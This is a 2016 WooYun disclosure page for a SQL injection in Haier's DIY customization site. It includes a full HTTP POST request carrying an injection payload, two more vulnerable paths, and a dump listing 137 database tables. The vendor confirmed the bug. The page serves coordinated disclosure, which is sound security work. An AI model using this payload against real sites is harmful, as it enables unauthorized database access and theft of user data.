当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167653

漏洞标题:海尔交互定制平台注入漏洞

相关厂商:海尔集团

漏洞作者: 不败顽童

提交时间:2016-01-06 11:09

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-07: 厂商已经确认,细节仅向厂商公开
2016-01-17: 细节向核心白帽子及相关领域专家公开
2016-01-27: 细节向普通白帽子公开
2016-02-06: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

打雷要下雨,雷欧,  
(什么?)   
下雨要打伞,雷欧,   
(这我也知道!)   
天冷穿棉袄,雷欧,雷诶欧
我被注入了,雷欧,雷欧欧
(为什么?)
请看下集

详细说明:

POST /customize/ajaxRestrain/ HTTP/1.1
Content-Length: 70
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://diy.haier.com:80/
Cookie: PHPSESSID=rtdj3ccqmuh71a5q0ta64maov7; e70a5cbd5f15e0e178dc3f0077ffd033=629626ec063cff552ef6e3487fc062dba4be16c4s%3A4%3A%22true%22%3B
Host: diy.haier.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
cancel=att081'%20AND%203*2*1%3d6%20AND%20'000Uc2s'%3d'000Uc2s&checked=
以下链接也存在注入:
/customize/AjaxAttrbutes
/goodstalk/talklist

漏洞证明:

2016-01-05_23-06-35.jpg


2016-01-05_23-07-12.jpg


Database: haier
[137 tables]
+---------------------------------+
| auth_assignment |
| auth_item |
| auth_item_child |
| diy_address |
| diy_admin |
| diy_admin_log |
| diy_admin_role |
| diy_adver |
| diy_article |
| diy_attachment |
| diy_auth_priv |
| diy_auth_role |
| diy_badword |
| diy_banner |
| diy_banner_position |
| diy_carts |
| diy_comment_report |
| diy_common_type |
| diy_coupon |
| diy_coupon_code |
| diy_coupon_goods |
| diy_creationist |
| diy_creationist_back |
| diy_creationist_like |
| diy_creatistion_point_back |
| diy_crowd_cast |
| diy_customize |
| diy_customize_attribute |
| diy_customize_middle |
| diy_customize_note |
| diy_customize_product |
| diy_customize_res |
| diy_customize_restrain |
| diy_customize_sample |
| diy_customize_val |
| diy_diylog |
| diy_diylog_copy |
| diy_feedback |
| diy_follow |
| diy_gag |
| diy_get_coupon |
| diy_goods |
| diy_goods_attribute |
| diy_goods_attribute_copy |
| diy_goods_attrs |
| diy_goods_attrs_copy |
| diy_goods_basic |
| diy_goods_category |
| diy_goods_category_copy |
| diy_goods_collect |
| diy_goods_collect_copy |
| diy_goods_copy |
| diy_goods_copy1 |
| diy_goods_diy |
| diy_goods_diy_copy |
| diy_goods_gallery |
| diy_goods_gallery_copy |
| diy_goods_part |
| diy_goods_part_copy |
| diy_goods_style |
| diy_goods_style_copy |
| diy_goods_talk |
| diy_goods_talk_copy |
| diy_goods_timeline |
| diy_goods_timeline_copy |
| diy_goods_total |
| diy_ideamarket |
| diy_ideamarket_cattr |
| diy_ideamarket_comment |
| diy_ideamarket_comment_like |
| diy_ideamarket_discuss |
| diy_ideamarket_editlog |
| diy_ideamarket_log |
| diy_ideamarket_message |
| diy_ideamarket_point |
| diy_ideamarket_timeline |
| diy_ideamarket_timeline_comment |
| diy_ideamarket_vote |
| diy_library |
| diy_library_middle |
| diy_like |
| diy_login_failed |
| diy_luck_draw |
| diy_luck_draw_log |
| diy_luck_draw_prize |
| diy_luck_draw_prize_log |
| diy_message |
| diy_order |
| diy_order_address |
| diy_order_comment |
| diy_order_goods |
| diy_order_info |
| diy_order_invoice |
| diy_other_areas |
| diy_other_cities |
| diy_other_provinces |
| diy_other_zipcode |
| diy_output_internet |
| diy_output_not_internet |
| diy_output_oes |
| diy_output_status |
| diy_pic |
| diy_pic_coor |
| diy_pic_coor_copy |
| diy_pic_copy |
| diy_prize |
| diy_prize_log |
| diy_recommend |
| diy_recommend_copy |
| diy_senior |
| diy_share |
| diy_shipping_area |
| diy_special |
| diy_survey_answer |
| diy_survey_contact |
| diy_survey_options |
| diy_survey_problem |
| diy_survey_theme |
| diy_sys_message |
| diy_system_menu |
| diy_toast |
| diy_users |
| diy_users_oauth |
| diy_wish |
| diy_wish_copy |
| diy_wish_want |
| diy_wish_want_copy |
| idiy_pages |
| idiy_pages_class |
| idiy_wx_creationist_vote |
| idiy_wx_creationist_vote_log |
| idiy_wx_diymenu |
| idiy_wx_keyword |
| idiy_wx_lottery_record |
| idiy_wx_prise |
| idiy_wx_prise_level |
| idiy_wx_users |
+---------------------------------+

修复方案:

屏蔽特殊字符

版权声明:转载请注明来源 不败顽童@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-07 11:58

厂商回复:

感谢白帽子的测试与提醒,已安排人员进行处理

最新状态:

暂无


漏洞评价:

评价